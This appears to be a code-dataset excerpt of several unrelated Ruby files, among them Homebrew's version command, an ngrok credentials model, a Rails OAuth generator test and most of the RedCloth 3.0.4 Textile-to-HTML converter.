| 39.5 | 132 | 0.668513 |
ff038f70960c0ece92fe64a5cb3d8adcee5602f8 | 720 | # typed: false
# frozen_string_literal: true
require "cli/parser"
module Homebrew
extend T::Sig
module_function
sig { returns(CLI::Parser) }
def __version_args
Homebrew::CLI::Parser.new do
usage_banner <<~EOS
`--version`
Print the version numbers of Homebrew, Homebrew/homebrew-core and Homebrew/homebrew-cask
(if tapped) to standard output.
EOS
max_named 0
end
end
def __version
__version_args.parse
puts "Homebrew #{HOMEBREW_VERSION}"
puts "#{CoreTap.instance.full_name} #{CoreTap.instance.version_string}"
puts "#{Tap.default_cask_tap.full_name} #{Tap.default_cask_tap.version_string}" if Tap.default_cask_tap.installed?
end
end
| 21.818182 | 118 | 0.701389 |
7ad16d0f62eafe187f6ddf3b059326ef3b8ad639 | 587 | # frozen_string_literal: true
module NgrokAPI
module Models
class AWSCredentials
attr_reader :client,
:attrs,
:aws_access_key_id,
:aws_secret_access_key
def initialize(client: nil, attrs: {})
@client = client
@attrs = attrs
@aws_access_key_id = @attrs['aws_access_key_id']
@aws_secret_access_key = @attrs['aws_secret_access_key']
end
def ==(other)
@attrs == other.attrs
end
def to_s
@attrs.to_s
end
def to_h
@attrs.to_h
end
end
end
end
| 18.34375 | 64 | 0.58092 |
115e2c2972ecf908dc36210f426a1a5a10228663 | 163 | # frozen_string_literal: true
# Faraday namespace.
module Faraday
# Exception used to control the Retry middleware.
class RetriableResponse < Error
end
end
| 18.111111 | 51 | 0.779141 |
e21cd6d062b82cf235b8c1320042e386a76e1ff6 | 1,332 | # frozen_string_literal: true
require "test_helper"
require "generators/boring/devise/install/install_generator"
require "generators/boring/oauth/google/install/install_generator"
class OauthGoogleInstallGeneratorTest < Rails::Generators::TestCase
tests Boring::Oauth::Google::InstallGenerator
setup :build_app
teardown :teardown_app
include GeneratorHelper
include ActiveSupport::Testing::Isolation
def destination_root
app_path
end
def test_should_install_google_oauth
Dir.chdir(app_path) do
quietly { Rails::Generators.invoke("boring:devise:install") }
quietly { run_generator }
assert_gem "omniauth-google-oauth2"
assert_migration "db/migrate/add_omniauth_to_users.rb"
assert_file "config/initializers/devise.rb" do |content|
assert_match('config.omniauth :google_oauth2', content)
end
assert_file "app/controllers/users/omniauth_callbacks_controller.rb"
assert_file "app/models/user.rb" do |content|
assert_match('devise :omniauthable, omniauth_providers: %i[google_oauth2]', content)
assert_match('def self.from_omniauth(auth)', content)
end
end
end
def test_should_raise_devise_configuration_missing_error
Dir.chdir(app_path) do
assert_raises do
run_generator
end
end
end
end
| 28.340426 | 92 | 0.747748 |
d5c14df242b7bfb1273b9bf31dba916cca77f002 | 466 | # Be sure to restart your server when you modify this file.
# Version of your assets, change this if you want to expire all your assets.
Rails.application.config.assets.version = '1.0'
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
# Rails.application.config.assets.precompile += %w( search.js )
Rails.application.config.assets.precompile += %w[polyfills.js helena_administration.css]
| 46.6 | 93 | 0.776824 |
4ac9ef6695ddfc91b0100495a2ae7d11dd069678 | 35,941 | # vim:ts=4:sw=4:
# = RedCloth - Textile and Markdown Hybrid for Ruby
#
# Homepage:: http://whytheluckystiff.net/ruby/redcloth/
# Author:: why the lucky stiff (http://whytheluckystiff.net/)
# Copyright:: (cc) 2004 why the lucky stiff (and his puppet organizations.)
# License:: BSD
#
# (see http://hobix.com/textile/ for a Textile Reference.)
#
# Based on (and also inspired by) both:
#
# PyTextile: http://diveintomark.org/projects/textile/textile.py.txt
# Textism for PHP: http://www.textism.com/tools/textile/
#
#
# = RedCloth
#
# RedCloth is a Ruby library for converting Textile and/or Markdown
# into HTML. You can use either format, intermingled or separately.
# You can also extend RedCloth to honor your own custom text stylings.
#
# RedCloth users are encouraged to use Textile if they are generating
# HTML and to use Markdown if others will be viewing the plain text.
#
# == What is Textile?
#
# Textile is a simple formatting style for text
# documents, loosely based on some HTML conventions.
#
# == Sample Textile Text
#
# h2. This is a title
#
# h3. This is a subhead
#
# This is a bit of paragraph.
#
# bq. This is a blockquote.
#
# = Writing Textile
#
# A Textile document consists of paragraphs. Paragraphs
# can be specially formatted by adding a small instruction
# to the beginning of the paragraph.
#
# h[n]. Header of size [n].
# bq. Blockquote.
# # Numeric list.
# * Bulleted list.
#
# == Quick Phrase Modifiers
#
# Quick phrase modifiers are also included, to allow formatting
# of small portions of text within a paragraph.
#
# \_emphasis\_
# \_\_italicized\_\_
# \*strong\*
# \*\*bold\*\*
# ??citation??
# -deleted text-
# +inserted text+
# ^superscript^
# ~subscript~
# @code@
# %(classname)span%
#
# ==notextile== (leave text alone)
#
# == Links
#
# To make a hypertext link, put the link text in "quotation
# marks" followed immediately by a colon and the URL of the link.
#
# Optional: text in (parentheses) following the link text,
# but before the closing quotation mark, will become a Title
# attribute for the link, visible as a tool tip when a cursor is above it.
#
# Example:
#
# "This is a link (This is a title) ":http://www.textism.com
#
# Will become:
#
# <a href="http://www.textism.com" title="This is a title">This is a link</a>
#
# == Images
#
# To insert an image, put the URL for the image inside exclamation marks.
#
# Optional: text that immediately follows the URL in (parentheses) will
# be used as the Alt text for the image. Images on the web should always
# have descriptive Alt text for the benefit of readers using non-graphical
# browsers.
#
# Optional: place a colon followed by a URL immediately after the
# closing ! to make the image into a link.
#
# Example:
#
# !http://www.textism.com/common/textist.gif(Textist)!
#
# Will become:
#
# <img src="http://www.textism.com/common/textist.gif" alt="Textist" />
#
# With a link:
#
# !/common/textist.gif(Textist)!:http://textism.com
#
# Will become:
#
# <a href="http://textism.com"><img src="/common/textist.gif" alt="Textist" /></a>
#
# == Defining Acronyms
#
# HTML allows authors to define acronyms via the tag. The definition appears as a
# tool tip when a cursor hovers over the acronym. A crucial aid to clear writing,
# this should be used at least once for each acronym in documents where they appear.
#
# To quickly define an acronym in Textile, place the full text in (parentheses)
# immediately following the acronym.
#
# Example:
#
# ACLU(American Civil Liberties Union)
#
# Will become:
#
# <acronym title="American Civil Liberties Union">ACLU</acronym>
#
# == Adding Tables
#
# In Textile, simple tables can be added by seperating each column by
# a pipe.
#
# |a|simple|table|row|
# |And|Another|table|row|
#
# Attributes are defined by style definitions in parentheses.
#
# table(border:1px solid black).
# (background:#ddd;color:red). |{}| | | |
#
# == Using RedCloth
#
# RedCloth is simply an extension of the String class, which can handle
# Textile formatting. Use it like a String and output HTML with its
# RedCloth#to_html method.
#
# doc = RedCloth.new "
#
# h2. Test document
#
# Just a simple test."
#
# puts doc.to_html
#
# By default, RedCloth uses both Textile and Markdown formatting, with
# Textile formatting taking precedence. If you want to turn off Markdown
# formatting, to boost speed and limit the processor:
#
# class RedCloth::Textile.new( str )
class RedCloth < String
VERSION = '3.0.4'
DEFAULT_RULES = [:textile, :markdown]
#
# Two accessor for setting security restrictions.
#
# This is a nice thing if you're using RedCloth for
# formatting in public places (e.g. Wikis) where you
# don't want users to abuse HTML for bad things.
#
# If +:filter_html+ is set, HTML which wasn't
# created by the Textile processor will be escaped.
#
# If +:filter_styles+ is set, it will also disable
# the style markup specifier. ('{color: red}')
#
attr_accessor :filter_html, :filter_styles
#
# Accessor for toggling hard breaks.
#
# If +:hard_breaks+ is set, single newlines will
# be converted to HTML break tags. This is the
# default behavior for traditional RedCloth.
#
attr_accessor :hard_breaks
# Accessor for toggling lite mode.
#
# In lite mode, block-level rules are ignored. This means
# that tables, paragraphs, lists, and such aren't available.
# Only the inline markup for bold, italics, entities and so on.
#
# r = RedCloth.new( "And then? She *fell*!", [:lite_mode] )
# r.to_html
# #=> "And then? She <strong>fell</strong>!"
#
attr_accessor :lite_mode
#
# Accessor for toggling span caps.
#
# Textile places `span' tags around capitalized
# words by default, but this wreaks havoc on Wikis.
# If +:no_span_caps+ is set, this will be
# suppressed.
#
attr_accessor :no_span_caps
#
# Establishes the markup predence. Available rules include:
#
# == Textile Rules
#
# The following textile rules can be set individually. Or add the complete
# set of rules with the single :textile rule, which supplies the rule set in
# the following precedence:
#
# refs_textile:: Textile references (i.e. [hobix]http://hobix.com/)
# block_textile_table:: Textile table block structures
# block_textile_lists:: Textile list structures
# block_textile_prefix:: Textile blocks with prefixes (i.e. bq., h2., etc.)
# inline_textile_image:: Textile inline images
# inline_textile_link:: Textile inline links
# inline_textile_span:: Textile inline spans
# glyphs_textile:: Textile entities (such as em-dashes and smart quotes)
#
# == Markdown
#
# refs_markdown:: Markdown references (for example: [hobix]: http://hobix.com/)
# block_markdown_setext:: Markdown setext headers
# block_markdown_atx:: Markdown atx headers
# block_markdown_rule:: Markdown horizontal rules
# block_markdown_bq:: Markdown blockquotes
# block_markdown_lists:: Markdown lists
# inline_markdown_link:: Markdown links
attr_accessor :rules
# Returns a new RedCloth object, based on _string_ and
# enforcing all the included _restrictions_.
#
# r = RedCloth.new( "h1. A <b>bold</b> man", [:filter_html] )
# r.to_html
# #=>"<h1>A <b>bold</b> man</h1>"
#
def initialize( string, restrictions = [] )
restrictions.each { |r| method( "#{ r }=" ).call( true ) }
super( string )
end
#
# Generates HTML from the Textile contents.
#
# r = RedCloth.new( "And then? She *fell*!" )
# r.to_html( true )
# #=>"And then? She <strong>fell</strong>!"
#
def to_html( *rules )
rules = DEFAULT_RULES if rules.empty?
# make our working copy
text = self.dup
@urlrefs = {}
@shelf = []
textile_rules = [:refs_textile, :block_textile_table, :block_textile_lists,
:block_textile_prefix, :inline_textile_image, :inline_textile_link,
:inline_textile_code, :inline_textile_span, :glyphs_textile]
markdown_rules = [:refs_markdown, :block_markdown_setext, :block_markdown_atx, :block_markdown_rule,
:block_markdown_bq, :block_markdown_lists,
:inline_markdown_reflink, :inline_markdown_link]
@rules = rules.collect do |rule|
case rule
when :markdown
markdown_rules
when :textile
textile_rules
else
rule
end
end.flatten
# standard clean up
incoming_entities text
clean_white_space text
# start processor
@pre_list = []
rip_offtags text
no_textile text
hard_break text
unless @lite_mode
refs text
blocks text
end
inline text
smooth_offtags text
retrieve text
text.gsub!( /<\/?notextile>/, '' )
text.gsub!( /x%x%/, '&' )
clean_html text if filter_html
text.strip!
text
end
#######
private
#######
#
# Mapping of 8-bit ASCII codes to HTML numerical entity equivalents.
# (from PyTextile)
#
TEXTILE_TAGS =
[[128, 8364], [129, 0], [130, 8218], [131, 402], [132, 8222], [133, 8230],
[134, 8224], [135, 8225], [136, 710], [137, 8240], [138, 352], [139, 8249],
[140, 338], [141, 0], [142, 0], [143, 0], [144, 0], [145, 8216], [146, 8217],
[147, 8220], [148, 8221], [149, 8226], [150, 8211], [151, 8212], [152, 732],
[153, 8482], [154, 353], [155, 8250], [156, 339], [157, 0], [158, 0], [159, 376]].
collect! do |a, b|
[a.chr, ( b.zero? and "" or "&#{ b };" )]
end
#
# Regular expressions to convert to HTML.
#
A_HLGN = /(?:(?:<>|<|>|\=|[()]+)+)/
A_VLGN = /[\-^~]/
C_CLAS = '(?:\([^)]+\))'
C_LNGE = '(?:\[[^\]]+\])'
C_STYL = '(?:\{[^}]+\})'
S_CSPN = '(?:\\\\\d+)'
S_RSPN = '(?:/\d+)'
A = "(?:#{A_HLGN}?#{A_VLGN}?|#{A_VLGN}?#{A_HLGN}?)"
S = "(?:#{S_CSPN}?#{S_RSPN}|#{S_RSPN}?#{S_CSPN}?)"
C = "(?:#{C_CLAS}?#{C_STYL}?#{C_LNGE}?|#{C_STYL}?#{C_LNGE}?#{C_CLAS}?|#{C_LNGE}?#{C_STYL}?#{C_CLAS}?)"
# PUNCT = Regexp::quote( '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' )
PUNCT = Regexp::quote( '!"#$%&\'*+,-./:;=?@\\^_`|~' )
PUNCT_NOQ = Regexp::quote( '!"#$&\',./:;=?@\\`|' )
PUNCT_Q = Regexp::quote( '*-_+^~%' )
HYPERLINK = '(\S+?)([^\w\s/;=\?]*?)(?=\s|<|$)'
# Text markup tags, don't conflict with block tags
SIMPLE_HTML_TAGS = [
'tt', 'b', 'i', 'big', 'small', 'em', 'strong', 'dfn', 'code',
'samp', 'kbd', 'var', 'cite', 'abbr', 'acronym', 'a', 'img', 'br',
'br', 'map', 'q', 'sub', 'sup', 'span', 'bdo'
]
QTAGS = [
['**', 'b'],
['*', 'strong'],
['??', 'cite', :limit],
['-', 'del', :limit],
['__', 'i'],
['_', 'em', :limit],
['%', 'span', :limit],
['+', 'ins', :limit],
['^', 'sup'],
['~', 'sub']
]
QTAGS.collect! do |rc, ht, rtype|
rcq = Regexp::quote rc
re =
case rtype
when :limit
/(\W)
(#{rcq})
(#{C})
(?::(\S+?))?
(\S.*?\S|\S)
#{rcq}
(?=\W)/x
else
/(#{rcq})
(#{C})
(?::(\S+))?
(\S.*?\S|\S)
#{rcq}/xm
end
[rc, ht, re, rtype]
end
# Elements to handle
GLYPHS = [
# [ /([^\s\[{(>])?\'([dmst]\b|ll\b|ve\b|\s|:|$)/, '\1’\2' ], # single closing
[ /([^\s\[{(>#{PUNCT_Q}][#{PUNCT_Q}]*)\'/, '\1’' ], # single closing
[ /\'(?=[#{PUNCT_Q}]*(s\b|[\s#{PUNCT_NOQ}]))/, '’' ], # single closing
[ /\'/, '‘' ], # single opening
[ /</, '<' ], # less-than
[ />/, '>' ], # greater-than
# [ /([^\s\[{(])?"(\s|:|$)/, '\1”\2' ], # double closing
[ /([^\s\[{(>#{PUNCT_Q}][#{PUNCT_Q}]*)"/, '\1”' ], # double closing
[ /"(?=[#{PUNCT_Q}]*[\s#{PUNCT_NOQ}])/, '”' ], # double closing
[ /"/, '“' ], # double opening
[ /\b( )?\.{3}/, '\1…' ], # ellipsis
[ /\b([A-Z][A-Z0-9]{2,})\b(?:[(]([^)]*)[)])/, '<acronym title="\2">\1</acronym>' ], # 3+ uppercase acronym
[ /(^|[^"][>\s])([A-Z][A-Z0-9 ]+[A-Z0-9])([^<A-Za-z0-9]|$)/, '\1<span class="caps">\2</span>\3', :no_span_caps ], # 3+ uppercase caps
[ /(\.\s)?\s?--\s?/, '\1—' ], # em dash
[ /\s->\s/, ' → ' ], # right arrow
[ /\s-\s/, ' – ' ], # en dash
[ /(\d+) ?x ?(\d+)/, '\1×\2' ], # dimension sign
[ /\b ?[(\[]TM[\])]/i, '™' ], # trademark
[ /\b ?[(\[]R[\])]/i, '®' ], # registered
[ /\b ?[(\[]C[\])]/i, '©' ] # copyright
]
H_ALGN_VALS = {
'<' => 'left',
'=' => 'center',
'>' => 'right',
'<>' => 'justify'
}
V_ALGN_VALS = {
'^' => 'top',
'-' => 'middle',
'~' => 'bottom'
}
#
# Flexible HTML escaping
#
def htmlesc( str, mode )
str.gsub!( '&', '&' )
str.gsub!( '"', '"' ) if mode != :NoQuotes
str.gsub!( "'", ''' ) if mode == :Quotes
str.gsub!( '<', '<')
str.gsub!( '>', '>')
end
# Search and replace for Textile glyphs (quotes, dashes, other symbols)
def pgl( text )
GLYPHS.each do |re, resub, tog|
next if tog and method( tog ).call
text.gsub! re, resub
end
end
# Parses Textile attribute lists and builds an HTML attribute string
def pba( text_in, element = "" )
return '' unless text_in
style = []
text = text_in.dup
if element == 'td'
colspan = $1 if text =~ /\\(\d+)/
rowspan = $1 if text =~ /\/(\d+)/
style << "vertical-align:#{ v_align( $& ) };" if text =~ A_VLGN
end
style << "#{ $1 };" if not filter_styles and
text.sub!( /\{([^}]*)\}/, '' )
lang = $1 if
text.sub!( /\[([^)]+?)\]/, '' )
cls = $1 if
text.sub!( /\(([^()]+?)\)/, '' )
style << "padding-left:#{ $1.length }em;" if
text.sub!( /([(]+)/, '' )
style << "padding-right:#{ $1.length }em;" if text.sub!( /([)]+)/, '' )
style << "text-align:#{ h_align( $& ) };" if text =~ A_HLGN
cls, id = $1, $2 if cls =~ /^(.*?)#(.*)$/
atts = ''
atts << " style=\"#{ style.join }\"" unless style.empty?
atts << " class=\"#{ cls }\"" unless cls.to_s.empty?
atts << " lang=\"#{ lang }\"" if lang
atts << " id=\"#{ id }\"" if id
atts << " colspan=\"#{ colspan }\"" if colspan
atts << " rowspan=\"#{ rowspan }\"" if rowspan
atts
end
TABLE_RE = /^(?:table(_?#{S}#{A}#{C})\. ?\n)?^(#{A}#{C}\.? ?\|.*?\|)(\n\n|\Z)/m
# Parses a Textile table block, building HTML from the result.
def block_textile_table( text )
text.gsub!( TABLE_RE ) do |matches|
tatts, fullrow = $~[1..2]
tatts = pba( tatts, 'table' )
tatts = shelve( tatts ) if tatts
rows = []
fullrow.
split( /\|$/m ).
delete_if { |x| x.empty? }.
each do |row|
ratts, row = pba( $1, 'tr' ), $2 if row =~ /^(#{A}#{C}\. )(.*)/m
cells = []
row.split( '|' ).each do |cell|
ctyp = 'd'
ctyp = 'h' if cell =~ /^_/
catts = ''
catts, cell = pba( $1, 'td' ), $2 if cell =~ /^(_?#{S}#{A}#{C}\. ?)(.*)/
unless cell.strip.empty?
catts = shelve( catts ) if catts
cells << "\t\t\t<t#{ ctyp }#{ catts }>#{ cell }</t#{ ctyp }>"
end
end
ratts = shelve( ratts ) if ratts
rows << "\t\t<tr#{ ratts }>\n#{ cells.join( "\n" ) }\n\t\t</tr>"
end
"\t<table#{ tatts }>\n#{ rows.join( "\n" ) }\n\t</table>\n\n"
end
end
LISTS_RE = /^([#*]+?#{C} .*?)$(?![^#*])/m
LISTS_CONTENT_RE = /^([#*]+)(#{A}#{C}) (.*)$/m
# Parses Textile lists and generates HTML
def block_textile_lists( text )
text.gsub!( LISTS_RE ) do |match|
lines = match.split( /\n/ )
last_line = -1
depth = []
lines.each_with_index do |line, line_id|
if line =~ LISTS_CONTENT_RE
tl,atts,content = $~[1..3]
if depth.last
if depth.last.length > tl.length
(depth.length - 1).downto(0) do |i|
break if depth[i].length == tl.length
lines[line_id - 1] << "</li>\n\t</#{ lT( depth[i] ) }l>\n\t"
depth.pop
end
end
if depth.last and depth.last.length == tl.length
lines[line_id - 1] << '</li>'
end
end
unless depth.last == tl
depth << tl
atts = pba( atts )
atts = shelve( atts ) if atts
lines[line_id] = "\t<#{ lT(tl) }l#{ atts }>\n\t<li>#{ content }"
else
lines[line_id] = "\t\t<li>#{ content }"
end
last_line = line_id
else
last_line = line_id
end
if line_id - last_line > 1 or line_id == lines.length - 1
depth.delete_if do |v|
lines[last_line] << "</li>\n\t</#{ lT( v ) }l>"
end
end
end
lines.join( "\n" )
end
end
CODE_RE = /(\W)
@
(?:\|(\w+?)\|)?
(.+?)
@
(?=\W)/x
def inline_textile_code( text )
text.gsub!( CODE_RE ) do |m|
before,lang,code,after = $~[1..4]
lang = " lang=\"#{ lang }\"" if lang
rip_offtags( "#{ before }<code#{ lang }>#{ code }</code>#{ after }" )
end
end
def lT( text )
text =~ /\#$/ ? 'o' : 'u'
end
def hard_break( text )
text.gsub!( /(.)\n(?!\Z| *([#*=]+(\s|$)|[{|]))/, "\\1<br />" ) if hard_breaks
end
BLOCKS_GROUP_RE = /\n{2,}(?! )/m
def blocks( text, deep_code = false )
text.replace( text.split( BLOCKS_GROUP_RE ).collect do |blk|
plain = blk !~ /\A[#*> ]/
# skip blocks that are complex HTML
if blk =~ /^<\/?(\w+).*>/ and not SIMPLE_HTML_TAGS.include? $1
blk
else
# search for indentation levels
blk.strip!
if blk.empty?
blk
else
code_blk = nil
blk.gsub!( /((?:\n(?:\n^ +[^\n]*)+)+)/m ) do |iblk|
flush_left iblk
blocks iblk, plain
iblk.gsub( /^(\S)/, "\t\\1" )
if plain
code_blk = iblk; ""
else
iblk
end
end
block_applied = 0
@rules.each do |rule_name|
block_applied += 1 if ( rule_name.to_s.match /^block_/ and method( rule_name ).call( blk ) )
end
if block_applied.zero?
if deep_code
blk = "\t<pre><code>#{ blk }</code></pre>"
else
blk = "\t<p>#{ blk }</p>"
end
end
# hard_break blk
blk + "\n#{ code_blk }"
end
end
end.join( "\n\n" ) )
end
def textile_bq( tag, atts, cite, content )
cite, cite_title = check_refs( cite )
cite = " cite=\"#{ cite }\"" if cite
atts = shelve( atts ) if atts
"\t<blockquote#{ cite }>\n\t\t<p#{ atts }>#{ content }</p>\n\t</blockquote>"
end
def textile_p( tag, atts, cite, content )
atts = shelve( atts ) if atts
"\t<#{ tag }#{ atts }>#{ content }</#{ tag }>"
end
alias textile_h1 textile_p
alias textile_h2 textile_p
alias textile_h3 textile_p
alias textile_h4 textile_p
alias textile_h5 textile_p
alias textile_h6 textile_p
def textile_fn_( tag, num, atts, cite, content )
atts << " id=\"fn#{ num }\""
atts << " class=\"footnote\""
content = "<sup>#{ num }</sup> #{ content }"
atts = shelve( atts ) if atts
"\t<p#{ atts }>#{ content }</p>"
end
BLOCK_RE = /^(([a-z]+)(\d*))(#{A}#{C})\.(?::(\S+))? (.*)$/m
def block_textile_prefix( text )
if text =~ BLOCK_RE
tag,tagpre,num,atts,cite,content = $~[1..6]
atts = pba( atts )
# pass to prefix handler
if respond_to? "textile_#{ tag }", true
text.gsub!( $&, method( "textile_#{ tag }" ).call( tag, atts, cite, content ) )
elsif respond_to? "textile_#{ tagpre }_", true
text.gsub!( $&, method( "textile_#{ tagpre }_" ).call( tagpre, num, atts, cite, content ) )
end
end
end
SETEXT_RE = /\A(.+?)\n([=-])[=-]* *$/m
def block_markdown_setext( text )
if text =~ SETEXT_RE
tag = if $2 == "="; "h2"; else; "h3"; end
blk, cont = "<#{ tag }>#{ $1 }</#{ tag }>", $'
blocks cont
text.replace( blk + cont )
end
end
ATX_RE = /\A(\#{1,6}) # $1 = string of #'s
[ ]*
(.+?) # $2 = Header text
[ ]*
\#* # optional closing #'s (not counted)
$/x
def block_markdown_atx( text )
if text =~ ATX_RE
tag = "h#{ $1.length }"
blk, cont = "<#{ tag }>#{ $2 }</#{ tag }>\n\n", $'
blocks cont
text.replace( blk + cont )
end
end
MARKDOWN_BQ_RE = /\A(^ *> ?.+$(.+\n)*\n*)+/m
def block_markdown_bq( text )
text.gsub!( MARKDOWN_BQ_RE ) do |blk|
blk.gsub!( /^ *> ?/, '' )
flush_left blk
blocks blk
blk.gsub!( /^(\S)/, "\t\\1" )
"<blockquote>\n#{ blk }\n</blockquote>\n\n"
end
end
MARKDOWN_RULE_RE = /^(#{
['*', '-', '_'].collect { |ch| '( ?' + Regexp::quote( ch ) + ' ?){3,}' }.join( '|' )
})$/
def block_markdown_rule( text )
text.gsub!( MARKDOWN_RULE_RE ) do |blk|
"<hr />"
end
end
# XXX TODO XXX
def block_markdown_lists( text )
end
def inline_textile_span( text )
QTAGS.each do |qtag_rc, ht, qtag_re, rtype|
text.gsub!( qtag_re ) do |m|
case rtype
when :limit
sta,qtag,atts,cite,content = $~[1..5]
else
qtag,atts,cite,content = $~[1..4]
sta = ''
end
atts = pba( atts )
atts << " cite=\"#{ cite }\"" if cite
atts = shelve( atts ) if atts
"#{ sta }<#{ ht }#{ atts }>#{ content }</#{ ht }>"
end
end
end
LINK_RE = /
([\s\[{(]|[#{PUNCT}])? # $pre
" # start
(#{C}) # $atts
([^"]+?) # $text
\s?
(?:\(([^)]+?)\)(?="))? # $title
":
(\S+?) # $url
(\/)? # $slash
([^\w\/;]*?) # $post
(?=<|\s|$)
/x
def inline_textile_link( text )
text.gsub!( LINK_RE ) do |m|
pre,atts,text,title,url,slash,post = $~[1..7]
url, url_title = check_refs( url )
title ||= url_title
atts = pba( atts )
atts = " href=\"#{ url }#{ slash }\"#{ atts }"
atts << " class=\"external\""
atts << " title=\"#{ title }\"" if title
atts = shelve( atts ) if atts
"#{ pre }<a#{ atts }>#{ text }</a>#{ post }"
end
end
MARKDOWN_REFLINK_RE = /
\[([^\[\]]+)\] # $text
[ ]? # opt. space
(?:\n[ ]*)? # one optional newline followed by spaces
\[(.*?)\] # $id
/x
def inline_markdown_reflink( text )
text.gsub!( MARKDOWN_REFLINK_RE ) do |m|
text, id = $~[1..2]
if id.empty?
url, title = check_refs( text )
else
url, title = check_refs( id )
end
atts = " href=\"#{ url }\""
atts << " title=\"#{ title }\"" if title
atts = shelve( atts )
"<a#{ atts }>#{ text }</a>"
end
end
MARKDOWN_LINK_RE = /
\[([^\[\]]+)\] # $text
\( # open paren
[ \t]* # opt space
<?(.+?)>? # $href
[ \t]* # opt space
(?: # whole title
(['"]) # $quote
(.*?) # $title
\3 # matching quote
)? # title is optional
\)
/x
def inline_markdown_link( text )
text.gsub!( MARKDOWN_LINK_RE ) do |m|
text, url, quote, title = $~[1..4]
atts = " href=\"#{ url }\""
atts << " title=\"#{ title }\"" if title
atts = shelve( atts )
"<a#{ atts }>#{ text }</a>"
end
end
TEXTILE_REFS_RE = /(^ *)\[([^\n]+?)\](#{HYPERLINK})(?=\s|$)/
MARKDOWN_REFS_RE = /(^ *)\[([^\n]+?)\]:\s+<?(#{HYPERLINK})>?(?:\s+"((?:[^"]|\\")+)")?(?=\s|$)/m
def refs( text )
@rules.each do |rule_name|
method( rule_name ).call( text ) if rule_name.to_s.match /^refs_/
end
end
def refs_textile( text )
text.gsub!( TEXTILE_REFS_RE ) do |m|
flag, url = $~[2..3]
@urlrefs[flag.downcase] = [url, nil]
nil
end
end
def refs_markdown( text )
text.gsub!( MARKDOWN_REFS_RE ) do |m|
flag, url = $~[2..3]
title = $~[6]
@urlrefs[flag.downcase] = [url, title]
nil
end
end
def check_refs( text )
ret = @urlrefs[text.downcase] if text
ret || [text, nil]
end
IMAGE_RE = /
(<p>|.|^) # start of line?
\! # opening
(\<|\=|\>)? # optional alignment atts
(#{C}) # optional style,class atts
(?:\. )? # optional dot-space
([^\s(!]+?) # presume this is the src
\s? # optional space
(?:\(((?:[^\(\)]|\([^\)]+\))+?)\))? # optional title
\! # closing
(?::#{ HYPERLINK })? # optional href
/x
def inline_textile_image( text )
text.gsub!( IMAGE_RE ) do |m|
stln,algn,atts,url,title,href,href_a1,href_a2 = $~[1..8]
atts = pba( atts )
atts = " src=\"#{ url }\"#{ atts }"
atts << " title=\"#{ title }\"" if title
atts << " alt=\"#{ title }\""
# size = @getimagesize($url);
# if($size) $atts.= " $size[3]";
href, alt_title = check_refs( href ) if href
url, url_title = check_refs( url )
out = ''
out << "<a#{ shelve( " href=\"#{ href }\"" ) }>" if href
out << "<img#{ shelve( atts ) } />"
out << "</a>#{ href_a1 }#{ href_a2 }" if href
if algn
algn = h_align( algn )
if stln == "<p>"
out = "<p style=\"float:#{ algn }\">#{ out }"
else
out = "#{ stln }<div style=\"float:#{ algn }\">#{ out }</div>"
end
else
out = stln + out
end
out
end
end
def shelve( val )
@shelf << val
" :redsh##{ @shelf.length }:"
end
def retrieve( text )
@shelf.each_with_index do |r, i|
text.gsub!( " :redsh##{ i + 1 }:", r )
end
end
def incoming_entities( text )
## turn any incoming ampersands into a dummy character for now.
## This uses a negative lookahead for alphanumerics followed by a semicolon,
## implying an incoming html entity, to be skipped
text.gsub!( /&(?![#a-z0-9]+;)/i, "x%x%" )
end
def no_textile( text )
text.gsub!( /(^|\s)==([^=]+.*?)==(\s|$)?/,
'\1<notextile>\2</notextile>\3' )
text.gsub!( /^ *==([^=]+.*?)==/m,
'\1<notextile>\2</notextile>\3' )
end
def clean_white_space( text )
# normalize line breaks
text.gsub!( /\r\n/, "\n" )
text.gsub!( /\r/, "\n" )
text.gsub!( /\t/, ' ' )
text.gsub!( /^ +$/, '' )
text.gsub!( /\n{3,}/, "\n\n" )
text.gsub!( /"$/, "\" " )
# if entire document is indented, flush
# to the left side
flush_left text
end
def flush_left( text )
indt = 0
if text =~ /^ /
while text !~ /^ {#{indt}}\S/
indt += 1
end unless text.empty?
if indt.nonzero?
text.gsub!( /^ {#{indt}}/, '' )
end
end
end
def footnote_ref( text )
text.gsub!( /\[([0-9]{1,2}?)\](\s)?/,
'<sup><a href="#fn\1">\1</a></sup>\2' )
end
OFFTAGS = /(code|pre|kbd|notextile)/
OFFTAG_MATCH = /(?:(<\/#{ OFFTAGS }>)|(<#{ OFFTAGS }[^>]*>))(.*?)(?=<\/?#{ OFFTAGS }|\Z)/mi
OFFTAG_OPEN = /<#{ OFFTAGS }/
OFFTAG_CLOSE = /<\/?#{ OFFTAGS }/
HASTAG_MATCH = /(<\/?\w[^\n]*?>)/m
ALLTAG_MATCH = /(<\/?\w[^\n]*?>)|.*?(?=<\/?\w[^\n]*?>|$)/m
def glyphs_textile( text, level = 0 )
if text !~ HASTAG_MATCH
pgl text
footnote_ref text
else
codepre = 0
text.gsub!( ALLTAG_MATCH ) do |line|
## matches are off if we're between <code>, <pre> etc.
if $1
if line =~ OFFTAG_OPEN
codepre += 1
elsif line =~ OFFTAG_CLOSE
codepre -= 1
codepre = 0 if codepre < 0
end
elsif codepre.zero?
glyphs_textile( line, level + 1 )
else
htmlesc( line, :NoQuotes )
end
# p [level, codepre, line]
line
end
end
end
def rip_offtags( text )
if text =~ /<.*>/
## strip and encode <pre> content
codepre, used_offtags = 0, {}
text.gsub!( OFFTAG_MATCH ) do |line|
if $3
offtag, aftertag = $4, $5
codepre += 1
used_offtags[offtag] = true
if codepre - used_offtags.length > 0
htmlesc( line, :NoQuotes ) unless used_offtags['notextile']
@pre_list.last << line
line = ""
else
htmlesc( aftertag, :NoQuotes ) if aftertag and not used_offtags['notextile']
line = "<redpre##{ @pre_list.length }>"
@pre_list << "#{ $3 }#{ aftertag }"
end
elsif $1 and codepre > 0
if codepre - used_offtags.length > 0
htmlesc( line, :NoQuotes ) unless used_offtags['notextile']
@pre_list.last << line
line = ""
end
codepre -= 1 unless codepre.zero?
used_offtags = {} if codepre.zero?
end
line
end
end
text
end
def smooth_offtags( text )
unless @pre_list.empty?
## replace <pre> content
text.gsub!( /<redpre#(\d+)>/ ) { @pre_list[$1.to_i] }
end
end
def inline( text )
[/^inline_/, /^glyphs_/].each do |meth_re|
@rules.each do |rule_name|
method( rule_name ).call( text ) if rule_name.to_s.match( meth_re )
end
end
end
def h_align( text )
H_ALGN_VALS[text]
end
